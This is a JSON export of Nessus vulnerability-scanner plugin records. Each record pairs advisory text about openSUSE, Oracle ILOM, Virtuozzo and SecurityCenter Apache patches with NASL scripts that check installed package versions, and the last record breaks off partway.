[{"lastseen": "2019-11-01T03:02:16", "bulletinFamily": "scanner", "description": "This update for Chromium to version 69.0.3497.92 fixes the following\nissues :\n\nSecurity issues fixed ((boo#1108114) :\n\n - Function signature mismatch in WebAssembly\n\n - URL Spoofing in Omnibox\n\nThe following tracked packaging issues were fixed :\n\n - the chromium package incorrectly provied swiftshader\n resolvables (boo#1108175)", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2018-1005.NASL", "href": "https://www.tenable.com/plugins/nessus/117518", "published": 
"2018-09-17T00:00:00", "title": "openSUSE Security Update : chromium (openSUSE-2018-1005)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1005.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117518);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/09/17 12:21:53\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2018-1005)\");\n script_summary(english:\"Check for the openSUSE-2018-1005 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for Chromium to version 69.0.3497.92 fixes the following\nissues :\n\nSecurity issues fixed ((boo#1108114) :\n\n - Function signature mismatch in WebAssembly\n\n - URL Spoofing in Omnibox\n\nThe following tracked packaging issues were fixed :\n\n - the chromium package incorrectly provied swiftshader\n resolvables (boo#1108175)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1108114\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1108175\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chromium packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"Medium\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-69.0.3497.92-lp150.2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-debuginfo-69.0.3497.92-lp150.2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-69.0.3497.92-lp150.2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", 
reference:\"chromium-debuginfo-69.0.3497.92-lp150.2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debugsource-69.0.3497.92-lp150.2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-69.0.3497.92-171.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-debuginfo-69.0.3497.92-171.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-69.0.3497.92-171.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debuginfo-69.0.3497.92-171.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debugsource-69.0.3497.92-171.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-01T03:05:32", "bulletinFamily": "scanner", "description": "This update for blueman fixes the following issues :\n\nThe following security issue was addressed :\n\n - Fixed the polkit authorization checks in blueman, which\n previously allowed any user with access to the D-Bus\n system bus to trigger certain network configuration\n logic in blueman without authentication (boo#1083066).", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2018-855.NASL", "href": "https://www.tenable.com/plugins/nessus/111636", "published": "2018-08-10T00:00:00", "title": "openSUSE Security Update : blueman (openSUSE-2018-855)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-855.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif 
(description)\n{\n script_id(111636);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/08/10 11:41:20\");\n\n script_name(english:\"openSUSE Security Update : blueman (openSUSE-2018-855)\");\n script_summary(english:\"Check for the openSUSE-2018-855 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for blueman fixes the following issues :\n\nThe following security issue was addressed :\n\n - Fixed the polkit authorization checks in blueman, which\n previously allowed any user with access to the D-Bus\n system bus to trigger certain network configuration\n logic in blueman without authentication (boo#1083066).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1083066\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected blueman packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"Medium\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:blueman\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:blueman-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:blueman-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:blueman-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:thunar-sendto-blueman\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/10\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"blueman-2.0.6-lp150.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"blueman-debuginfo-2.0.6-lp150.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"blueman-debugsource-2.0.6-lp150.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"blueman-lang-2.0.6-lp150.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"thunar-sendto-blueman-2.0.6-lp150.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"blueman-2.0.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"blueman-debuginfo-2.0.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"blueman-debugsource-2.0.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"blueman-lang-2.0.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", 
reference:\"thunar-sendto-blueman-2.0.6-2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"blueman / blueman-debuginfo / blueman-debugsource / blueman-lang / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-17T19:12:07", "bulletinFamily": "scanner", "description": "According to its self-reported version number, the version of Oracle\nIntegrated Lights Out Manager (ILOM) is affected by multiple vulnerabilities\nas described in the advisory.", "modified": "2019-11-02T00:00:00", "id": "ORACLE_ILOM_3_2_6.NASL", "href": "https://www.tenable.com/plugins/nessus/104047", "published": "2017-10-20T00:00:00", "title": "Oracle Integrated Lights Out Manager (ILOM) < 3.2.6 Multiple Vulnerabilities (uncredentialed check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104047);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2016-6304\",\n \"CVE-2016-7431\",\n \"CVE-2017-3588\",\n \"CVE-2017-10099\",\n \"CVE-2017-10194\",\n \"CVE-2017-10260\",\n \"CVE-2017-10265\",\n \"CVE-2017-10275\"\n );\n script_bugtraq_id(\n 93150,\n 94454,\n 101426,\n 101431,\n 101435,\n 101437,\n 101442,\n 101445\n );\n\n script_name(english:\"Oracle Integrated Lights Out Manager (ILOM) < 3.2.6 Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks DCNM version number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network management system installed on the remote host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Oracle\nIntegrated 
Lights Out Manager (ILOM) is affected by multiple vulnerabilities\nas described in the advisory.\");\n # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1e07fa0e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle Integrated Lights Out Manager (ILOM) 3.2.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10265\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:sun:embedded_lights_out_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:integrated_lights_out_manager_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_ilom_web_detect.nasl\");\n script_require_keys(\"installed_sw/ilom\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nget_install_count(app_name:\"ilom\", exit_if_zero:TRUE);\n\nport = get_http_port(default:443);\napp = \"Oracle ILOM\";\n\ninstall = get_single_install(\n app_name : \"ilom\",\n port : port,\n exit_if_unknown_ver : TRUE\n );\nversion = install[\"version\"];\npath = install[\"path\"];\nurl = build_url(port:port, qs:path);\n\nfix = \"3.2.6\";\n\nif (ver_compare(ver:version, fix:fix) == -1)\n{\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url, version);\n\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-27T10:13:13", "bulletinFamily": "scanner", "description": "An update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* It was discovered that the mod_session_crypto module of httpd did\nnot use any mechanisms to verify integrity of the encrypted session\ndata stored in the user", "modified": "2019-11-02T00:00:00", "id": "VIRTUOZZO_VZLSA-2017-0906.NASL", "href": "https://www.tenable.com/plugins/nessus/101445", "published": "2017-07-13T00:00:00", "title": "Virtuozzo 7 : httpd / httpd-devel / httpd-manual / httpd-tools / etc (VZLSA-2017-0906)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101445);\n script_version(\"1.78\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-8743\"\n );\n\n script_name(english:\"Virtuozzo 7 : httpd / httpd-devel / httpd-manual / httpd-tools / etc (VZLSA-2017-0906)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* It was discovered that the mod_session_crypto module of httpd did\nnot use any mechanisms to verify integrity of the encrypted session\ndata stored in the user's browser. A remote attacker could use this\nflaw to decrypt and modify session data using a padding oracle attack.\n(CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not\nproperly check for memory allocation failures. A remote attacker could\nuse this flaw to cause httpd child processes to repeatedly crash if\nthe server used HTTP digest authentication. (CVE-2016-2161)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed\ncertain characters not permitted by the HTTP protocol specification to\nappear unencoded in HTTP request headers. If httpd was used in\nconjunction with a proxy or backend server that interpreted those\ncharacters differently, a remote attacker could possibly use this flaw\nto inject data into HTTP responses, resulting in proxy cache\npoisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return '400\nBad Request' error to HTTP clients which do not strictly follow HTTP\nprotocol specification. A newly introduced configuration directive\n'HttpProtocolOptions Unsafe' can be used to re-enable the old less\nstrict parsing. However, such setting also re-introduces the\nCVE-2016-8743 issue.\n\nBug Fix(es) :\n\n* When waking up child processes during a graceful restart, the httpd\nparent process could attempt to open more connections than necessary\nif a large number of child processes had been active prior to the\nrestart. Consequently, a graceful restart could take a long time to\ncomplete. 
With this update, httpd has been fixed to limit the number\nof connections opened during a graceful restart to the number of\nactive children, and the described problem no longer occurs.\n(BZ#1420002)\n\n* Previously, httpd running in a container returned the 500 HTTP\nstatus code (Internal Server Error) when a connection to a WebSocket\nserver was closed. As a consequence, the httpd server failed to\ndeliver the correct HTTP status and data to a client. With this\nupdate, httpd correctly handles all proxied requests to the WebSocket\nserver, and the described problem no longer occurs. (BZ#1429947)\n\n* In a configuration using LDAP authentication with the\nmod_authnz_ldap module, the name set using the AuthLDAPBindDN\ndirective was not correctly used to bind to the LDAP server for all\nqueries. Consequently, authorization attempts failed. The LDAP modules\nhave been fixed to ensure the configured name is correctly bound for\nLDAP queries, and authorization using LDAP no longer fails.\n(BZ#1420047)\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. 
Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-0906.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60d35048\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-0906\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected httpd / httpd-devel / httpd-manual / httpd-tools / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"httpd-2.4.6-45.vl7.4\",\n \"httpd-devel-2.4.6-45.vl7.4\",\n \"httpd-manual-2.4.6-45.vl7.4\",\n \"httpd-tools-2.4.6-45.vl7.4\",\n \"mod_ldap-2.4.6-45.vl7.4\",\n \"mod_proxy_html-2.4.6-45.vl7.4\",\n \"mod_session-2.4.6-45.vl7.4\",\n \"mod_ssl-2.4.6-45.vl7.4\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / 
httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-11-01T03:29:40", "bulletinFamily": "scanner", "description": "The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Apache :\n\n - A flaw exists in the mod_session_crypto module due to\n encryption for data and cookies using the configured\n ciphers with possibly either CBC or ECB modes of\n operation (AES256-CBC by default). An unauthenticated,\n remote attacker can exploit this, via a padding oracle\n attack, to decrypt information without knowledge of the\n encryption key, resulting in the disclosure of\n potentially sensitive information. (CVE-2016-0736)\n\n - A denial of service vulnerability exists in the\n mod_auth_digest module during client entry allocation.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted input, to exhaust shared memory\n resources, resulting in a server crash. 
(CVE-2016-2161)\n\n - The Apache HTTP Server is affected by a\n man-in-the-middle vulnerability known as ", "modified": "2019-11-02T00:00:00", "id": "SECURITYCENTER_APACHE_2_4_25.NASL", "href": "https://www.tenable.com/plugins/nessus/101044", "published": "2017-06-26T00:00:00", "title": "Tenable SecurityCenter Apache 2.4.x < 2.4.25 Multiple Vulnerabilities (TNS-2017-04) (httpoxy)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101044);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/03/27 13:17:50\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-5387\",\n \"CVE-2016-8740\",\n \"CVE-2016-8743\"\n );\n script_bugtraq_id(\n 91816,\n 94650,\n 95076,\n 95077,\n 95078\n );\n script_xref(name:\"CERT\", value:\"797896\");\n script_xref(name:\"EDB-ID\", value:\"40961\");\n\n script_name(english:\"Tenable SecurityCenter Apache 2.4.x < 2.4.25 Multiple Vulnerabilities (TNS-2017-04) (httpoxy)\");\n script_summary(english:\"Checks the version of Apache in SecurityCenter.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Tenable SecurityCenter application on the remote host contains a\nweb server that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Apache :\n\n - A flaw exists in the mod_session_crypto module due to\n encryption for data and cookies using the configured\n ciphers with possibly either CBC or ECB modes of\n operation (AES256-CBC by default). An unauthenticated,\n remote attacker can exploit this, via a padding oracle\n attack, to decrypt information without knowledge of the\n encryption key, resulting in the disclosure of\n potentially sensitive information. 
(CVE-2016-0736)\n\n - A denial of service vulnerability exists in the\n mod_auth_digest module during client entry allocation.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted input, to exhaust shared memory\n resources, resulting in a server crash. (CVE-2016-2161)\n\n - The Apache HTTP Server is affected by a\n man-in-the-middle vulnerability known as 'httpoxy' due\n to a failure to properly resolve namespace conflicts in\n accordance with RFC 3875 section 4.1.18. The HTTP_PROXY\n environment variable is set based on untrusted user data\n in the 'Proxy' header of HTTP requests. The HTTP_PROXY\n environment variable is used by some web client\n libraries to specify a remote proxy server. An\n unauthenticated, remote attacker can exploit this, via a\n crafted 'Proxy' header in an HTTP request, to redirect\n an application's internal HTTP traffic to an arbitrary\n proxy server where it may be observed or manipulated.\n (CVE-2016-5387)\n\n - A denial of service vulnerability exists in the\n mod_http2 module due to improper handling of the\n LimitRequestFields directive. An unauthenticated, remote\n attacker can exploit this, via specially crafted\n CONTINUATION frames in an HTTP/2 request, to inject\n unlimited request headers into the server, resulting in\n the exhaustion of memory resources. (CVE-2016-8740)\n\n - A flaw exists due to improper handling of whitespace\n patterns in user-agent headers. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted user-agent header, to cause the program to\n incorrectly process sequences of requests, resulting in\n interpreting responses incorrectly, polluting the cache,\n or disclosing the content from one request to a second\n downstream user-agent. 
(CVE-2016-8743)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/tns-2017-04\");\n script_set_attribute(attribute:\"see_also\", value:\"https://static.tenable.com/prod_docs/upgrade_security_center.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Tenable SecurityCenter version 5.4.3 or later.\nAlternatively, contact the vendor for a patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"manual\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"Score based on analysis of the vendor advisory.\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n \n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/09\");\n 